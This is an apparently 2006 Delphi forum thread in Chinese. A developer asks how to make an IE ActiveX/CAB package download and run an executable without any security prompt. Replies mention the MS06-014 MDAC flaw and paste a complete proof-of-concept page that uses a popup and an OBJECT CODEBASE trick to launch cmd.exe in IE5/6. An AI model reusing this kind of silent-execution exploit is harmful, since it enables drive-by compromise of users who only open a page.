由上網中病毒木馬所想到的…與網頁中使用ocx,cab包有關。

由上網中病毒木馬所想到的...與網頁中使用ocx,cab包有關。 Delphi / Windows SDK/API
http://www.delphi2007.net/DelphiBase/html/delphi_20061218114045129.html
不知你是否有這樣的經曆，開啟了某個網頁之後，發現系統中毒了，而你並沒有進行任何可疑的操作，僅僅是就開啟了一個網頁而已。  
   
  我曾經就是為了殺毒，去查資料，結果開啟一個貌似殺毒介紹的網站，刹那間，機器上多中了10幾種病毒。而此時IE並沒有提示我有什麼外掛程式，是否需要安裝等等。  
   
  現在的問題就是，我自己做的一個ocx,不管怎麼打包，怎麼簽名，到客戶那裡都會有提示是否需要下載的，我就奇怪了，有些病毒怎麼就那麼強悍？？  
   
  我現在想實現的效果就是，用戶端不需要任何提示，第一次下載的時候不需要提示，以後每次啟動並執行時候也不需要提示，而且IE的安全設定就是預設的設定。另外，我還想實現自動下載cab包完畢之後，自動運行包內的一個可執行檔。  
   
  高手看看是否能實現，或發表點意見，我不是想做病毒，而是想把b/s結構的軟體最佳化一下，讓他智能點。  
   
  這個想法已經很久了，實驗了很久也沒能實現！

那些病毒不是OCX，而是EXE檔案。

那麼他怎麼讓你的機器運行那些exe檔案的??

ie6以前的版本可以實現

是EXE檔案是利用了MDAC的一個漏洞  
  詳細情況請見微軟資訊安全諮詢:http://www.microsoft.com/china/technet/security/bulletin/MS06-014.mspx

最新研究報告:  
   
  <HTML>  
  <HEAD>  
  <TITLE>IE6   security...</TITLE>  
  <SCRIPT   language=JScript>  
  var   programName=new   Array(  
          'c:/windows/system32/cmd.exe',  
          'c:/winnt/system32/cmd.exe',  
          'c:/cmd.exe'  
  );  
   
  function   Init(){  
          var   oPopup=window.createPopup();  
          var   oPopBody=oPopup.document.body;  
          var   n,html='';  
          for(n=0;n<programName.length;n++)  
                  html+="<OBJECT   NAME='X'   CLASSID='CLSID:11111111-1111-1111-1111-111111111111'   CODEBASE='"+programName[n]+"'   %1='r'></OBJECT>";  
          oPopBody.innerHTML=html;  
          oPopup.show(290,   190,   200,   200,   document.body);  
  }  
   
  </SCRIPT>  
  </head>  
  <BODY   onload="Init()">  
  <p>  
  This   page   doesn't   do   anything   malicious(這個頁面沒有任何惡意),   but   is   a   demonstration   of   how   to   execute   a   program   on   a   remote   machine   using   the  
  marvelously   secure   Internet   Explorer   web   browser!!(但它示範了如何在一個遠程機上使用令人驚異的安全的IE瀏覽器執行一個程式!!有點諷刺微軟的IE的味道,即通過IE執行用戶端機中的程式)  
  </p>  
  <p>  
  Up   until   at   least   18/02/02,   this   script   would   open   a   command   window   when   viewed   in   IE5/6   under   WindowsXP   and   Win2k   (possibly   also   WinME).   There  
  are   currently   no   patches   available   using   "Windows   Update"   which   will   prevent   this.  
  </p>  
   
   
  Delphi中的人氣實在不怎麼樣！！！

去他媽的，自己解決了。  
   
 

怎麼解決的,能不能告知